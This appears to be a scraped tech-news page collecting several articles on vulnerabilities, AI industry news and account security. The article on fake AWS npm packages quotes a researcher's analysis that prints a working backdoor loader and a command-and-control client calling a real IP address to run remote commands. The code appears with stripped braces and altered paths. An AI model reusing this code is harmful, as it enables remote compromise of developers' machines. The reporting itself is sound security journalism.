Biz & IT

vulnerability-in-cisco-smart-software-manager-lets-attackers-change-any-user-password

Vulnerability in Cisco Smart Software Manager lets attackers change any user password

GET YER PATCH —

Yep, passwords for administrators can be changed, too.

Vulnerability in Cisco Smart Software Manager lets attackers change any user password

Cisco on Wednesday disclosed a maximum-security vulnerability that allows remote threat actors with no authentication to change the password of any user, including those of administrators with accounts, on Cisco Smart Software Manager On-Prem devices.

The Cisco Smart Software Manager On-Prem resides inside the customer premises and provides a dashboard for managing licenses for all Cisco gear in use. It’s used by customers who can’t or don’t want to manage licenses in the cloud, as is more common.

In a bulletin, Cisco warns that the product contains a vulnerability that allows hackers to change any account’s password. The severity of the vulnerability, tracked as CVE-2024-20419, is rated 10, the maximum score.

“This vulnerability is due to improper implementation of the password-change process,” the Cisco bulletin stated. “An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user.”

There are no workarounds available to mitigate the threat.

It’s unclear precisely what an attacker can do after gaining administrative control over the device. One possibility is that the web user interface and application programming interface the attacker gains administrative control over make it possible to pivot to other Cisco devices connected to the same network and, from there, steal data, encrypt files, or perform similar actions. Cisco representatives didn’t immediately respond to an email. This post will be updated if a response comes later.

A security update linked to the bulletin fixes the vulnerability. Cisco said it isn’t aware of any evidence that the vulnerability is being actively exploited.

Vulnerability in Cisco Smart Software Manager lets attackers change any user password Read More »

here’s-how-carefully-concealed-backdoor-in-fake-aws-files-escaped-mainstream-notice

Here’s how carefully concealed backdoor in fake AWS files escaped mainstream notice

DEVS IN THE CROSSHAIRS —

Files available on the open source NPM repository underscore a growing sophistication.

A cartoon door leads to a wall of computer code.

Researchers have determined that two fake AWS packages downloaded hundreds of times from the open source NPM JavaScript repository contained carefully concealed code that backdoored developers’ computers when executed.

The packages—img-aws-s3-object-multipart-copy and legacyaws-s3-object-multipart-copy—were attempts to appear as aws-s3-object-multipart-copy, a legitimate JavaScript library for copying files using Amazon’s S3 cloud service. The fake files included all the code found in the legitimate library but added an additional JavaScript file named loadformat.js. That file provided what appeared to be benign code and three JPG images that were processed during package installation. One of those images contained code fragments that, when reconstructed, formed code for backdooring the developer device.

Growing sophistication

“We have reported these packages for removal, however the malicious packages remained available on npm for nearly two days,” researchers from Phylum, the security firm that spotted the packages, wrote. “This is worrying as it implies that most systems are unable to detect and promptly report on these packages, leaving developers vulnerable to attack for longer periods of time.”

In an email, Phylum Head of Research Ross Bryant said img-aws-s3-object-multipart-copy received 134 downloads before it was taken down. The other file, legacyaws-s3-object-multipart-copy, got 48.

The care the package developers put into the code and the effectiveness of their tactics underscores the growing sophistication of attacks targeting open source repositories, which besides NPM have included PyPI, GitHub, and RubyGems. The advances made it possible for the vast majority of malware-scanning products to miss the backdoor sneaked into these two packages. In the past 17 months, threat actors backed by the North Korean government have targeted developers twice, one of those using a zero-day vulnerability.

Phylum researchers provided a deep-dive analysis of how the concealment worked:

Analyzing the loadformat.js file, we find what appears to be some fairly innocuous image analysis code.

However, upon closer review, we see that this code is doing a few interesting things, resulting in execution on the victim machine.

After reading the image file from the disk, each byte is analyzed. Any bytes with a value between 32 and 126 are converted from Unicode values into a character and appended to the analyzepixels variable.

function processImage(filePath)   	console.log("Processing image...");  	const data = fs.readFileSync(filePath);  	let analyzepixels = "";  	let convertertree = false;    	for (let i = 0; i < data.length; i++) {      	const value = data[i];      	if (value >= 32 && value <= 126) {          	analyzepixels += String.fromCharCode(value);      	} else {          	if (analyzepixels.length > 2000)               	convertertree = true;              	break;          	          	analyzepixels = "";      	  	}        	// ...  

The threat actor then defines two distinct bodies of a function and stores each in their own variables, imagebyte and analyzePixels.

let analyzePixеls = `  	if (false)       	exec("node -v", (error, stdout, stderr) =>           	console.log(stdout);      	);  	  	console.log("check nodejs version...");  	`;    let imagebyte = `  	const httpsOptions =       	hostname: 'cloudconvert.com',      	path: '/image-converter',      	method: 'POST'  	;  	const req = https.request(httpsOptions, res =>       	console.log('Status Code:', res.statusCode);  	);  	req.on('error', error =>       	console.error(error);  	);  	req.end();  	console.log("Executing operation...");  	`;  

If convertertree is set to true, imagebyte is set to analyzepixels. In plain language, if converttree is set, it will execute whatever is contained in the script we extracted from the image file.

if (convertertree)   	console.log("Optimization complete. Applying advanced features...");  	imagebyte = analyzepixels;   else   	console.log("Optimization complete. No advanced features applied.");    

Looking back above, we note that convertertree will be set to true if the length of the bytes found in the image is greater than 2,000.

if (analyzepixels.length > 2000)     convertertree = true;    break;    

The author then creates a new function using either code that sends an empty POST request to cloudconvert.com or initiates executing whatever was extracted from the image files.

const func = new Function('https', 'exec', 'os', imagebyte);  func(https, exec, os);  

The lingering question is, what is contained in the images that this is trying to execute?

Command-and-Control in a JPEG

Looking at the bottom of the loadformat.js file, we see the following:

processImage('logo1.jpg');  processImage('logo2.jpg');  processImage('logo3.jpg');  

We find these three files in the package’s root, which are included below without modification, unless otherwise noted.

Appears as logo1.jpg in the package
Appears as logo2.jpg in the package
Appears as logo3.jpg in the package. Modified here as the file is corrupted and in some cases would not display properly.

If we run each of these through the processImage(...) function from above, we find that the Intel image (i.e., logo1.jpg) does not contain enough “valid” bytes to set the converttree variable to true. The same goes for logo3.jpg, the AMD logo. However, for the Microsoft logo (logo2.jpg), we find the following, formatted for readability:

let fetchInterval = 0x1388;  let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);  const clientInfo =     'name': os.hostname(),    'os': os.type() + " " + os.release()  ;  const agent = new https.Agent(    'rejectUnauthorized': false  );  function registerClient()     const _0x47c6de = JSON.stringify(clientInfo);    const _0x5a10c1 =   	'hostname': "85.208.108.29",  	'port': 0x1bb,  	'path': "https://arstechnica.com/register",  	'method': "POST",  	'headers':     	'Content-Type': "application/json",    	'Content-Length': Buffer.byteLength(_0x47c6de)  	,  	'agent': agent    ;    const _0x38f695 = https.request(_0x5a10c1, _0x454719 =>   	console.log("Registered with server as " + clientInfo.name);    );    _0x38f695.on("error", _0x1159ec =>   	console.error("Problem with registration: " + _0x1159ec.message);    );    _0x38f695.write(_0x47c6de);    _0x38f695.end();    function fetchAndExecuteCommand()     const _0x2dae30 =   	'hostname': "85.208.108.29",  	'port': 0x1bb,  	'path': "https://arstechnica.com/get-command?clientId=" + encodeURIComponent(clientInfo.name),  	'method': "GET",  	'agent': agent    ;    https.get(_0x2dae30, _0x4a0c09 =>   	let _0x41cd12 = '';  	_0x4a0c09.on("data", _0x5cbbc5 =>     	_0x41cd12 += _0x5cbbc5.toString();  	);  	_0x4a0c09.on("end", () =>     	console.log("Received command:", _0x41cd12);    	if (_0x41cd12.startsWith('setInterval:'))       	const _0x1e3896 = parseInt(_0x41cd12.split(':')[0x1], 0xa);      	if (!isNaN(_0x1e3896) && _0x1e3896 > 0x0)         	clearInterval(intervalId);        	fetchInterval = _0x1e3896 0x3e8;        	intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);        	console.log("Interval has been updated to " + _0x1e3896 + " seconds.");      	 else         	console.log("Invalid interval command received.");      	    	 else       	if (_0x41cd12.startsWith("cd "))         	const _0x58bd7d = _0x41cd12.substring(0x3).trim();        	try           	process.chdir(_0x58bd7d);          	console.log("Changed directory to " + process.cwd());        	 catch (_0x2ee272)           	console.error("Change directory failed: " + _0x2ee272);        	      	 else if (_0x41cd12 !== "No commands")         	exec(_0x41cd12,           	'cwd': process.cwd()        	, (_0x5da676, _0x1ae10c, _0x46788b) =>           	let _0x4a96cd = _0x1ae10c;          	if (_0x5da676)             	console.error("exec error: " + _0x5da676);            	_0x4a96cd += "\nError: " + _0x46788b;          	          	postResult(_0x4a96cd);        	);      	 else         	console.log("No commands to execute");      	    	  	);    ).on("error", _0x2e8190 =>   	console.error("Got error: " + _0x2e8190.message);    );    function postResult(_0x1d73c1)     const _0xc05626 =   	'hostname': "85.208.108.29",  	'port': 0x1bb,  	'path': "https://arstechnica.com/post-result?clientId=" + encodeURIComponent(clientInfo.name),  	'method': "POST",  	'headers':     	'Content-Type': "text/plain",    	'Content-Length': Buffer.byteLength(_0x1d73c1)  	,  	'agent': agent    ;    const _0x2fcb05 = https.request(_0xc05626, _0x448ba6 =>   	console.log("Result sent to the server");    );    _0x2fcb05.on('error', _0x1f60a7 =>   	console.error("Problem with request: " + _0x1f60a7.message);    );    _0x2fcb05.write(_0x1d73c1);    _0x2fcb05.end();    registerClient();  

This code first registers the new client with the remote C2 by sending the following clientInfo to 85.208.108.29.

const clientInfo =     'name': os.hostname(),    'os': os.type() + " " + os.release()  ;  

It then sets up an interval that periodically loops through and fetches commands from the attacker every 5 seconds.

let fetchInterval = 0x1388;  let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);  

Received commands are executed on the device, and the output is sent back to the attacker on the endpoint /post-results?clientId=.

One of the most innovative methods in recent memory for concealing an open source backdoor was discovered in March, just weeks before it was to be included in a production release of the XZ Utils, a data-compression utility available on almost all installations of Linux. The backdoor was implemented through a five-stage loader that used a series of simple but clever techniques to hide itself. Once installed, the backdoor allowed the threat actors to log in to infected systems with administrative system rights.

The person or group responsible spent years working on the backdoor. Besides the sophistication of the concealment method, the entity devoted large amounts of time to producing high-quality code for open source projects in a successful effort to build trust with other developers.

In May, Phylum disrupted a separate campaign that backdoored a package available in PyPI that also used steganography, a technique that embeds secret code into images.

“In the last few years, we’ve seen a dramatic rise in the sophistication and volume of malicious packages published to open source ecosystems,” Phylum researchers wrote. “Make no mistake, these attacks are successful. It is absolutely imperative that developers and security organizations alike are keenly aware of this fact and are deeply vigilant with regard to open source libraries they consume.”

Here’s how carefully concealed backdoor in fake AWS files escaped mainstream notice Read More »

microsoft-cto-kevin-scott-thinks-llm-“scaling-laws”-will-hold-despite-criticism

Microsoft CTO Kevin Scott thinks LLM “scaling laws” will hold despite criticism

As the word turns —

Will LLMs keep improving if we throw more compute at them? OpenAI dealmaker thinks so.

Kevin Scott, CTO and EVP of AI at Microsoft speaks onstage during Vox Media's 2023 Code Conference at The Ritz-Carlton, Laguna Niguel on September 27, 2023 in Dana Point, California.

Enlarge / Kevin Scott, CTO and EVP of AI at Microsoft speaks onstage during Vox Media’s 2023 Code Conference at The Ritz-Carlton, Laguna Niguel on September 27, 2023 in Dana Point, California.

During an interview with Sequoia Capital’s Training Data podcast published last Tuesday, Microsoft CTO Kevin Scott doubled down on his belief that so-called large language model (LLM) “scaling laws” will continue to drive AI progress, despite some skepticism in the field that progress has leveled out. Scott played a key role in forging a $13 billion technology-sharing deal between Microsoft and OpenAI.

“Despite what other people think, we’re not at diminishing marginal returns on scale-up,” Scott said. “And I try to help people understand there is an exponential here, and the unfortunate thing is you only get to sample it every couple of years because it just takes a while to build supercomputers and then train models on top of them.”

LLM scaling laws refer to patterns explored by OpenAI researchers in 2020 showing that the performance of language models tends to improve predictably as the models get larger (more parameters), are trained on more data, and have access to more computational power (compute). The laws suggest that simply scaling up model size and training data can lead to significant improvements in AI capabilities without necessarily requiring fundamental algorithmic breakthroughs.

Since then, other researchers have challenged the idea of persisting scaling laws over time, but the concept is still a cornerstone of OpenAI’s AI development philosophy.

You can see Scott’s comments in the video below beginning around 46: 05:

Microsoft CTO Kevin Scott on how far scaling laws will extend

Scott’s optimism contrasts with a narrative among some critics in the AI community that progress in LLMs has plateaued around GPT-4 class models. The perception has been fueled by largely informal observations—and some benchmark results—about recent models like Google’s Gemini 1.5 Pro, Anthropic’s Claude Opus, and even OpenAI’s GPT-4o, which some argue haven’t shown the dramatic leaps in capability seen in earlier generations, and that LLM development may be approaching diminishing returns.

“We all know that GPT-3 was vastly better than GPT-2. And we all know that GPT-4 (released thirteen months ago) was vastly better than GPT-3,” wrote AI critic Gary Marcus in April. “But what has happened since?”

The perception of plateau

Scott’s stance suggests that tech giants like Microsoft still feel justified in investing heavily in larger AI models, betting on continued breakthroughs rather than hitting a capability plateau. Given Microsoft’s investment in OpenAI and strong marketing of its own Microsoft Copilot AI features, the company has a strong interest in maintaining the perception of continued progress, even if the tech stalls.

Frequent AI critic Ed Zitron recently wrote in a post on his blog that one defense of continued investment into generative AI is that “OpenAI has something we don’t know about. A big, sexy, secret technology that will eternally break the bones of every hater,” he wrote. “Yet, I have a counterpoint: no it doesn’t.”

Some perceptions of slowing progress in LLM capabilities and benchmarking may be due to the rapid onset of AI in the public eye when, in fact, LLMs have been developing for years prior. OpenAI continued to develop LLMs during a roughly three-year gap between the release of GPT-3 in 2020 and GPT-4 in 2023. Many people likely perceived a rapid jump in capability with GPT-4’s launch in 2023 because they had only become recently aware of GPT-3-class models with the launch of ChatGPT in late November 2022, which used GPT-3.5.

In the podcast interview, the Microsoft CTO pushed back against the idea that AI progress has stalled, but he acknowledged the challenge of infrequent data points in this field, as new models often take years to develop. Despite this, Scott expressed confidence that future iterations will show improvements, particularly in areas where current models struggle.

“The next sample is coming, and I can’t tell you when, and I can’t predict exactly how good it’s going to be, but it will almost certainly be better at the things that are brittle right now, where you’re like, oh my god, this is a little too expensive, or a little too fragile, for me to use,” Scott said in the interview. “All of that gets better. It’ll get cheaper, and things will become less fragile. And then more complicated things will become possible. That is the story of each generation of these models as we’ve scaled up.”

Microsoft CTO Kevin Scott thinks LLM “scaling laws” will hold despite criticism Read More »

google-makes-it-easier-for-users-to-switch-on-advanced-account-protection

Google makes it easier for users to switch on advanced account protection

APP MADE EASIER —

The strict requirement for two physical keys is now eased when passkeys are used.

Google makes it easier for users to switch on advanced account protection

Getty Images

Google is making it easier for people to lock down their accounts with strong multifactor authentication by adding the option to store secure cryptographic keys in the form of passkeys rather than on physical token devices.

Google’s Advanced Protection Program, introduced in 2017, requires the strongest form of multifactor authentication (MFA). Whereas many forms of MFA rely on one-time passcodes sent through SMS or emails or generated by authenticator apps, accounts enrolled in advanced protection require MFA based on cryptographic keys stored on a secure physical device. Unlike one-time passcodes, security keys stored on physical devices are immune to credential phishing and can’t be copied or sniffed.

Democratizing APP

APP, short for Advanced Protection Program, requires the key to be accompanied by a password whenever a user logs into an account on a new device. The protection prevents the types of account takeovers that allowed Kremlin-backed hackers to access the Gmail accounts of Democratic officials in 2016 and go on to leak stolen emails to interfere with the presidential election that year.

Until now, Google required people to have two physical security keys to enroll in APP. Now, the company is allowing people to instead use two passkeys or one passkey and one physical token. Those seeking further security can enroll using as many keys as they want.

“We’re expanding the aperture so people have more choice in how they enroll in this program,” Shuvo Chatterjee, the project lead for APP, told Ars. He said the move comes in response to comments Google has received from some users who either couldn’t afford to buy the physical keys or lived or worked in regions where they’re not available.

As always, users must still have two keys to enroll to prevent being locked out of accounts if one of them is lost or broken. While lockouts are always a problem, they can be much worse for APP users because the recovery process is much more rigorous and takes much longer than for accounts not enrolled in the program.

Passkeys are the creation of the FIDO Alliance, a cross-industry group comprised of hundreds of companies. They’re stored locally on a device and can also be stored in the same type of hardware token storing MFA keys. Passkeys can’t be extracted from the device and require either a PIN or a scan of a fingerprint or face. They provide two factors of authentication: something the user knows—the underlying password used when the passkey was first generated—and something the user has—in the form of the device storing the passkey.

Of course, the relaxed requirements only go so far since users still must have two devices. But by expanding the types of devices needed,  APP becomes more accessible since many people already have a phone and computer, Chatterjee said.

“If you’re in a place where you can’t get security keys, it’s more convenient,” he explained. “This is a step toward democratizing how much access [users] get to this highest security tier Google offers.”

Despite the increased scrutiny involved in the recovery process for APP accounts, Google is renewing its recommendation that users provide a phone number and email address as backup.

“The most resilient thing to do is have multiple things on file, so if you lose that security key or the key blows up, you have a way to get back into your account,” Chatterjee said. He’s not providing the “secret sauce” details about how the process works, but he said it involves “tons of signals we look at to figure out what’s really happening.

“Even if you do have a recovery phone, a recovery phone by itself isn’t going to get you access to your account,” he said. “So if you get SIM swapped, it doesn’t mean someone gets access to your account. It’s a combination of various factors. It’s the summation of that that will help you on your path to recovery.”

Google users can enroll in APP by visiting this link.

Google makes it easier for users to switch on advanced account protection Read More »

openai-reportedly-nears-breakthrough-with-“reasoning”-ai,-reveals-progress-framework

OpenAI reportedly nears breakthrough with “reasoning” AI, reveals progress framework

studies in hype-otheticals —

Five-level AI classification system probably best seen as a marketing exercise.

Illustration of a robot with many arms.

OpenAI recently unveiled a five-tier system to gauge its advancement toward developing artificial general intelligence (AGI), according to an OpenAI spokesperson who spoke with Bloomberg. The company shared this new classification system on Tuesday with employees during an all-hands meeting, aiming to provide a clear framework for understanding AI advancement. However, the system describes hypothetical technology that does not yet exist and is possibly best interpreted as a marketing move to garner investment dollars.

OpenAI has previously stated that AGI—a nebulous term for a hypothetical concept that means an AI system that can perform novel tasks like a human without specialized training—is currently the primary goal of the company. The pursuit of technology that can replace humans at most intellectual work drives most of the enduring hype over the firm, even though such a technology would likely be wildly disruptive to society.

OpenAI CEO Sam Altman has previously stated his belief that AGI could be achieved within this decade, and a large part of the CEO’s public messaging has been related to how the company (and society in general) might handle the disruption that AGI may bring. Along those lines, a ranking system to communicate AI milestones achieved internally on the path to AGI makes sense.

OpenAI’s five levels—which it plans to share with investors—range from current AI capabilities to systems that could potentially manage entire organizations. The company believes its technology (such as GPT-4o that powers ChatGPT) currently sits at Level 1, which encompasses AI that can engage in conversational interactions. However, OpenAI executives reportedly told staff they’re on the verge of reaching Level 2, dubbed “Reasoners.”

Bloomberg lists OpenAI’s five “Stages of Artificial Intelligence” as follows:

  • Level 1: Chatbots, AI with conversational language
  • Level 2: Reasoners, human-level problem solving
  • Level 3: Agents, systems that can take actions
  • Level 4: Innovators, AI that can aid in invention
  • Level 5: Organizations, AI that can do the work of an organization

A Level 2 AI system would reportedly be capable of basic problem-solving on par with a human who holds a doctorate degree but lacks access to external tools. During the all-hands meeting, OpenAI leadership reportedly demonstrated a research project using their GPT-4 model that the researchers believe shows signs of approaching this human-like reasoning ability, according to someone familiar with the discussion who spoke with Bloomberg.

The upper levels of OpenAI’s classification describe increasingly potent hypothetical AI capabilities. Level 3 “Agents” could work autonomously on tasks for days. Level 4 systems would generate novel innovations. The pinnacle, Level 5, envisions AI managing entire organizations.

This classification system is still a work in progress. OpenAI plans to gather feedback from employees, investors, and board members, potentially refining the levels over time.

Ars Technica asked OpenAI about the ranking system and the accuracy of the Bloomberg report, and a company spokesperson said they had “nothing to add.”

The problem with ranking AI capabilities

OpenAI isn’t alone in attempting to quantify levels of AI capabilities. As Bloomberg notes, OpenAI’s system feels similar to levels of autonomous driving mapped out by automakers. And in November 2023, researchers at Google DeepMind proposed their own five-level framework for assessing AI advancement, showing that other AI labs have also been trying to figure out how to rank things that don’t yet exist.

OpenAI’s classification system also somewhat resembles Anthropic’s “AI Safety Levels” (ASLs) first published by the maker of the Claude AI assistant in September 2023. Both systems aim to categorize AI capabilities, though they focus on different aspects. Anthropic’s ASLs are more explicitly focused on safety and catastrophic risks (such as ASL-2, which refers to “systems that show early signs of dangerous capabilities”), while OpenAI’s levels track general capabilities.

However, any AI classification system raises questions about whether it’s possible to meaningfully quantify AI progress and what constitutes an advancement (or even what constitutes a “dangerous” AI system, as in the case of Anthropic). The tech industry so far has a history of overpromising AI capabilities, and linear progression models like OpenAI’s potentially risk fueling unrealistic expectations.

There is currently no consensus in the AI research community on how to measure progress toward AGI or even if AGI is a well-defined or achievable goal. As such, OpenAI’s five-tier system should likely be viewed as a communications tool to entice investors that shows the company’s aspirational goals rather than a scientific or even technical measurement of progress.

OpenAI reportedly nears breakthrough with “reasoning” AI, reveals progress framework Read More »

exim-vulnerability-affecting-1.5-million-servers-lets-attackers-attach-malicious-files

Exim vulnerability affecting 1.5 million servers lets attackers attach malicious files

GIRD YOUR LOINS —

Based on past attacks, It wouldn’t be surprising to see active targeting this time too.

Exim vulnerability affecting 1.5 million servers lets attackers attach malicious files

More than 1.5 million email servers are vulnerable to attacks that can deliver executable attachments to user accounts, security researchers said.

The servers run versions of the Exim mail transfer agent that are vulnerable to a critical vulnerability that came to light 10 days ago. Tracked as CVE-2024-39929 and carrying a severity rating of 9.1 out of 10, the vulnerability makes it trivial for threat actors to bypass protections that normally prevent the sending of attachments that install apps or execute code. Such protections are a first line of defense against malicious emails designed to install malware on end-user devices.

A serious security issue

“I can confirm this bug,” Exim project team member Heiko Schlittermann wrote on a bug-tracking site. “It looks like a serious security issue to me.”

Researchers at security firm Censys said Wednesday that of the more than 6.5 million public-facing SMTP email servers appearing in Internet scans, 4.8 million of them (roughly 74 percent) run Exim. More than 1.5 million of the Exim servers, or roughly 31 percent, are running a vulnerable version of the open-source mail app.

While there are no known reports of active exploitation of the vulnerability, it wouldn’t be surprising to see active targeting, given the ease of attacks and the large number of vulnerable servers. In 2020, one of the world’s most formidable hacking groups—the Kremlin-backed Sandworm—exploited a severe Exim vulnerability tracked as CVE-2019-10149, which allowed them to send emails that executed malicious code that ran with unfettered root system rights. The attacks began in August 2019, two months after the vulnerability came to light. They continued through at least May 2020.

CVE-2024-39929 stems from an error in the way Exim parses multiline headers as specified in RFC 2231. Threat actors can exploit it to bypass extension blocking and deliver executable attachments in emails sent to end users. The vulnerability exists in all Exim versions up to and including 4.97.1. A fix is available in the Release Candidate 3 of Exim 4.98.

Given the requirement that end users must click on an attached executable for the attack to work, this Exim vulnerability isn’t as serious as the one that was exploited starting in 2019. That said, social engineering people remains among the most effective attack methods. Admins should assign a high priority to updating to the latest version.

Exim vulnerability affecting 1.5 million servers lets attackers attach malicious files Read More »

intuit’s-ai-gamble:-mass-layoff-of-1,800-paired-with-hiring-spree

Intuit’s AI gamble: Mass layoff of 1,800 paired with hiring spree

In the name of AI —

Intuit CEO: “Companies that aren’t prepared to take advantage of [AI] will fall behind.”

Signage for financial software company Intuit at the company's headquarters in the Silicon Valley town of Mountain View, California, August 24, 2016.

On Wednesday, Intuit CEO Sasan Goodarzi announced in a letter to the company that it would be laying off 1,800 employees—about 10 percent of its workforce of around 18,000—while simultaneously planning to hire the same number of new workers as part of a major restructuring effort purportedly focused on AI.

“As I’ve shared many times, the era of AI is one of the most significant technology shifts of our lifetime,” wrote Goodarzi in a blog post on Intuit’s website. “This is truly an extraordinary time—AI is igniting global innovation at an incredible pace, transforming every industry and company in ways that were unimaginable just a few years ago. Companies that aren’t prepared to take advantage of this AI revolution will fall behind and, over time, will no longer exist.”

The CEO says Intuit is in a position of strength and that the layoffs are not cost-cutting related, but they allow the company to “allocate additional investments to our most critical areas to support our customers and drive growth.” With new hires, the company expects its overall headcount to grow in its 2025 fiscal year.

Intuit’s layoffs (which collectively qualify as a “mass layoff” under the WARN act) hit various departments within the company, including closing Intuit’s offices in Edmonton, Canada, and Boise, Idaho, affecting over 250 employees. Approximately 1,050 employees will receive layoffs because they’re “not meeting expectations,” according to Goodarzi’s letter. Intuit has also eliminated more than 300 roles across the company to “streamline” operations and shift resources toward AI, and the company plans to consolidate 80 tech roles to “sites where we are strategically growing our technology teams and capabilities,” such as Atlanta, Bangalore, New York, Tel Aviv, and Toronto.

In turn, the company plans to accelerate investments in its AI-powered financial assistant, Intuit Assist, which provides AI-generated financial recommendations. The company also plans to hire new talent in engineering, product development, data science, and customer-facing roles, with a particular emphasis on AI expertise.

Not just about AI

Despite Goodarzi’s heavily AI-focused message, the restructuring at Intuit reveals a more complex picture. A closer look at the layoffs shows that many of the 1,800 job cuts stem from performance-based departures (such as the aforementioned 1,050). The restructuring also includes a 10 percent reduction in executive positions at the director level and above (“To continue increasing our velocity of decision making,” Goodarzi says).

These numbers suggest that the reorganization may also serve as an opportunity for Intuit to trim its workforce of underperforming staff, using the AI hype cycle as a compelling backdrop for a broader house-cleaning effort.

But as far as CEOs are concerned, it’s always a good time to talk about how they’re embracing the latest, hottest thing in technology: “With the introduction of GenAI,” Goodarzi wrote, “we are now delivering even more compelling customer experiences, increasing monetization potential, and driving efficiencies in how the work gets done within Intuit. But it’s just the beginning of the AI revolution.”

Intuit’s AI gamble: Mass layoff of 1,800 paired with hiring spree Read More »

in-bid-to-loosen-nvidia’s-grip-on-ai,-amd-to-buy-finnish-startup-for-$665m

In bid to loosen Nvidia’s grip on AI, AMD to buy Finnish startup for $665M

AI tech stack —

The acquisition is the largest of its kind in Europe in a decade.

In bid to loosen Nvidia’s grip on AI, AMD to buy Finnish startup for $665M

AMD is to buy Finnish artificial intelligence startup Silo AI for $665 million in one of the largest such takeovers in Europe as the US chipmaker seeks to expand its AI services to compete with market leader Nvidia.

California-based AMD said Silo’s 300-member team would use its software tools to build custom large language models (LLMs), the kind of AI technology that underpins chatbots such as OpenAI’s ChatGPT and Google’s Gemini. The all-cash acquisition is expected to close in the second half of this year, subject to regulatory approval.

“This agreement helps us both accelerate our customer engagements and deployments while also helping us accelerate our own AI tech stack,” Vamsi Boppana, senior vice president of AMD’s artificial intelligence group, told the Financial Times.

The acquisition is the largest of a privately held AI startup in Europe since Google acquired UK-based DeepMind for around 400 million pounds in 2014, according to data from Dealroom.

The deal comes at a time when buyouts by Silicon Valley companies have come under tougher scrutiny from regulators in Brussels and the UK. Europe-based AI startups, including Mistral, DeepL, and Helsing, have raised hundreds of millions of dollars this year as investors seek out a local champion to rival US-based OpenAI and Anthropic.

Helsinki-based Silo AI, which is among the largest private AI labs in Europe, offers tailored AI models and platforms to enterprise customers. The Finnish company launched an initiative last year to build LLMs in European languages, including Swedish, Icelandic, and Danish.

AMD’s AI technology competes with that of Nvidia, which has taken the lion’s share of the high-performance chip market. Nvidia’s success has propelled its valuation past $3 trillion this year as tech companies push to build the computing infrastructure needed to power the biggest AI models. AMD started to roll out its MI300 chips late last year in a direct challenge to Nvidia’s “Hopper” line of chips.

Peter Sarlin, Silo AI co-founder and chief executive, called the acquisition the “logical next step” as the Finnish group seeks to become a “flagship” AI company.

Silo AI is committed to “open source” AI models, which are available for free and can be customized by anyone. This distinguishes it from the likes of OpenAI and Google, which favor their own proprietary or “closed” models.

The startup previously described its family of open models, called “Poro,” as an important step toward “strengthening European digital sovereignty” and democratizing access to LLMs.

The concentration of the most powerful LLMs into the hands of a few US-based Big Tech companies is meanwhile attracting attention from antitrust regulators in Washington and Brussels.

The Silo deal shows AMD seeking to scale its business quickly and drive customer engagement with its own offering. AMD views Silo, which builds custom models for clients, as a link between its “foundational” AI software and the real-world applications of the technology.

Software has become a new battleground for semiconductor companies as they try to lock in customers to their hardware and generate more predictable revenues, outside the boom-and-bust chip sales cycle.

Nvidia’s success in the AI market stems from its multibillion-dollar investment in Cuda, its proprietary software that allows chips originally designed for processing computer graphics and video games to run a wider range of applications.

Since starting to develop Cuda in 2006, Nvidia has expanded its software platform to include a range of apps and services, largely aimed at corporate customers that lack the in-house resources and skills that Big Tech companies have to build on its technology.

Nvidia now offers more than 600 “pre-trained” models, meaning they are simpler for customers to deploy. The Santa Clara, California-based group last month started rolling out a “microservices” platform, called NIM, which promises to let developers build chatbots and AI “co-pilot” services quickly.

Historically, Nvidia has offered its software free of charge to buyers of its chips, but said this year that it planned to charge for products such as NIM.

AMD is among several companies contributing to the development of an OpenAI-led rival to Cuda, called Triton, which would let AI developers switch more easily between chip providers. Meta, Microsoft, and Intel have also worked on Triton.

© 2024 The Financial Times Ltd. All rights reserved. Please do not copy and paste FT articles and redistribute by email or post to the web.

In bid to loosen Nvidia’s grip on AI, AMD to buy Finnish startup for $665M Read More »

new-blast-radius-attack-breaks-30-year-old-protocol-used-in-networks-everywhere

New Blast-RADIUS attack breaks 30-year-old protocol used in networks everywhere

AUTHENTICATION PROTOCOL SHATTERED —

Ubiquitous RADIUS scheme uses homegrown authentication based on MD5. Yup, you heard right.

New Blast-RADIUS attack breaks 30-year-old protocol used in networks everywhere

Getty Images

One of the most widely used network protocols is vulnerable to a newly discovered attack that can allow adversaries to gain control over a range of environments, including industrial controllers, telecommunications services, ISPs, and all manner of enterprise networks.

Short for Remote Authentication Dial-In User Service, RADIUS harkens back to the days of dial-in Internet and network access through public switched telephone networks. It has remained the de facto standard for lightweight authentication ever since and is supported in virtually all switches, routers, access points, and VPN concentrators shipped in the past two decades. Despite its early origins, RADIUS remains an essential staple for managing client-server interactions for:

  • VPN access
  • DSL and Fiber to the Home connections offered by ISPs,
  • Wi-Fi and 802.1X authentication
  • 2G and 3G cellular roaming
  • 5G Data Network Name authentication
  • Mobile data offloading
  • Authentication over private APNs for connecting mobile devices to enterprise networks
  • Authentication to critical infrastructure management devices
  • Eduroam and OpenRoaming Wi-Fi

RADIUS provides seamless interaction between clients—typically routers, switches, or other appliances providing network access—and a central RADIUS server, which acts as the gatekeeper for user authentication and access policies. The purpose of RADIUS is to provide centralized authentication, authorization, and accounting management for remote logins.

The protocol was developed in 1991 by a company known as Livingston Enterprises. In 1997 the Internet Engineering Task Force made it an official standard, which was updated three years later. Although there is a draft proposal for sending RADIUS traffic inside of a TLS-encrypted session that’s supported by some vendors, many devices using the protocol only send packets in clear text through UDP (User Datagram Protocol).

XKCD

A more detailed illustration of RADIUS using Password Authentication Protocol over UDP.

Enlarge / A more detailed illustration of RADIUS using Password Authentication Protocol over UDP.

Goldberg et al.

Roll-your-own authentication with MD5? For real?

Since 1994, RADIUS has relied on an improvised, home-grown use of the MD5 hash function. First created in 1991 and adopted by the IETF in 1992, MD5 was at the time a popular hash function for creating what are known as “message digests” that map an arbitrary input like a number, text, or binary file to a fixed-length 16-byte output.

For a cryptographic hash function, it should be computationally impossible for an attacker to find two inputs that map to the same output. Unfortunately, MD5 proved to be based on a weak design: Within a few years, there were signs that the function might be more susceptible than originally thought to attacker-induced collisions, a fatal flaw that allows the attacker to generate two distinct inputs that produce identical outputs. These suspicions were formally verified in a paper published in 2004 by researchers Xiaoyun Wang and Hongbo Yu and further refined in a research paper published three years later.

